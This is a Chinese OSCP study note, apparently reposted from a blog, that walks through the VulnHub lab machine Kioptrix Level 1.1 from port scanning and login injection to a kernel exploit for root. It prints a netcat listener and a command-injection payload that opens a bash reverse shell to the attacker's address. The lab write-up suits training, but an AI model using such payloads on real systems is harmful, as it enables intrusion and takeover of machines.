OSCP备考系列 第0x02篇笔记。
笔记顺序参考官方靶场(节选)
OSCP官方推荐靶场
https://docs.google.com/spreadsheets/u/0/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview?pli=1#
靶机地址:
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
01.主机发现
02.对发现的主机进行信息收集
a..端口探测
发现80端口开放 尝试访问
b.对目标靶机进行目录扫描
判断网站的指纹信息:
登录口 检测注入点:找到了用户名和密码
登录以后发现是一个命令执行的输入口:
反弹shell:查看系统版本查找漏洞
监听:nc -lvvp 5454
127.0.0.1 | bash -i >& /dev/tcp/192.168.0.110/5454 0>&1
查看操作系统、内核版本
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
查找系统存在的漏洞:
然后把对应的EXP下载到本地:
本地起http服务:
在目标机器里面:下载该exp文件
编译下载的文件:
运行编译后的文件 获取到当前机器的ROOT权限
总结:
参考内容:
https://www.cnblogs.com/wsec/p/vulnhub0x02.html
原文始发于微信公众号(0x00实验室):VulnHub靶机 | Kioptrix-Level 1.1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论